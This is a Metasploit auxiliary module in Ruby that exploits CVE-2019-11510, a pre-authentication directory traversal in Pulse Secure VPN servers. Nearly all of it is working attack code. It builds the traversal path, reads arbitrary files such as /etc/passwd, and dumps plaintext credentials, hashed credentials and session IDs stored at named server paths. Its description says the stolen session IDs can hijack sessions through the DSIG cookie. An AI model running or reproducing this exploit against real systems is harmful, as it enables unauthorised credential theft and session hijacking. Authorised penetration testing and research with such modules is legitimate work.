Pulse Secure VPN Arbitrary File Disclosure

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',  
'Description' => %q{  
This module exploits a pre-auth directory traversal in the Pulse Secure  
VPN server to dump an arbitrary file. Dumped files are stored in loot.  
  
If the "Automatic" action is set, plaintext and hashed credentials, as  
well as session IDs, will be dumped. Valid sessions can be hijacked by  
setting the "DSIG" browser cookie to a valid session ID.  
  
For the "Manual" action, please specify a file to dump via the "FILE"  
option. /etc/passwd will be dumped by default. If the "PRINT" option is  
set, file contents will be printed to the screen, with any unprintable  
characters replaced by a period.  
  
Please see related module exploit/linux/http/pulse_secure_cmd_exec for  
a post-auth exploit that can leverage the results from this module.  
},  
'Author' => [  
'Orange Tsai', # Discovery (@orange_8361)  
'Meh Chang', # Discovery (@mehqq_)  
'Alyssa Herrera', # PoC (@Alyssa_Herrera_)  
'Justin Wagner', # Module (@0xDezzy)  
'wvu' # Module  
],  
'References' => [  
['CVE', '2019-11510'],  
['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],  
['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],  
['URL', 'https://hackerone.com/reports/591295']  
],  
'DisclosureDate' => '2019-04-24', # Public disclosure  
'License' => MSF_LICENSE,  
'Actions' => [  
['Automatic', 'Description' => 'Dump creds and sessions'],  
['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']  
],  
'DefaultAction' => 'Automatic',  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true,  
'HttpClientTimeout' => 5 # This seems sane  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS],  
'Reliability' => [],  
'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']  
}  
))  
  
register_options([  
OptString.new(  
'FILE',  
[  
true,  
'File to dump (manual mode only)',  
'/etc/passwd'  
]  
),  
OptBool.new(  
'PRINT',  
[  
false,  
'Print file contents (manual mode only)',  
true  
]  
)  
])  
end  
  
def the_chosen_one  
return datastore['FILE'], 'User-chosen file'  
end  
  
def run  
files =  
case action.name  
when 'Automatic'  
print_status('Running in automatic mode')  
  
# Order by most sensitive first  
[  
plaintext_creds,  
session_ids,  
hashed_creds  
]  
when 'Manual'  
print_status('Running in manual mode')  
  
# /etc/passwd by default  
[the_chosen_one]  
end  
  
files.each do |path, info|  
print_status("Dumping #{path}")  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => dir_traversal(path),  
'partial' => true # Allow partial response due to timeout  
)  
  
unless res  
fail_with(Failure::Unreachable, "Could not dump #{path}")  
end  
  
handle_response(res, path, info)  
end  
end  
  
def handle_response(res, path, info)  
case res.code  
when 200  
case action.name  
when 'Automatic'  
# TODO: Parse plaintext and hashed creds  
if path == session_ids.first  
print_status('Parsing session IDs...')  
  
parse_sids(res.body).each do |sid|  
print_good("Session ID found: #{sid}")  
end  
end  
when 'Manual'  
printable = res.body.gsub(/[^[:print:][:space:]]/, '.')  
  
print_line(printable) if datastore['PRINT']  
end  
  
print_good(store_loot(  
self.name, # ltype  
'application/octet-stream', # ctype  
rhost, # host  
res.body, # data  
path, # filename  
info # info  
))  
when 302  
fail_with(Failure::NotVulnerable, "Redirected to #{res.redirection}")  
when 400  
print_error("Invalid path #{path}")  
when 404  
print_error("#{path} not found")  
else  
print_error("I don't know what a #{res.code} code is")  
end  
end  
  
def dir_traversal(path)  
normalize_uri(  
'/dana-na/../dana/html5acc/guacamole/../../../../../..',  
"#{path}?/dana/html5acc/guacamole/" # Bypass query/vars_get  
)  
end  
  
def parse_sids(body)  
body.to_s.scan(/randomVal([[:xdigit:]]+)/).flatten.reverse  
end  
  
def plaintext_creds  
return '/data/runtime/mtmp/lmdb/dataa/data.mdb', 'Plaintext credentials'  
end  
  
def session_ids  
return '/data/runtime/mtmp/lmdb/randomVal/data.mdb', 'Session IDs'  
end  
  
def hashed_creds  
return '/data/runtime/mtmp/system', 'Hashed credentials'  
end  
  
end  
`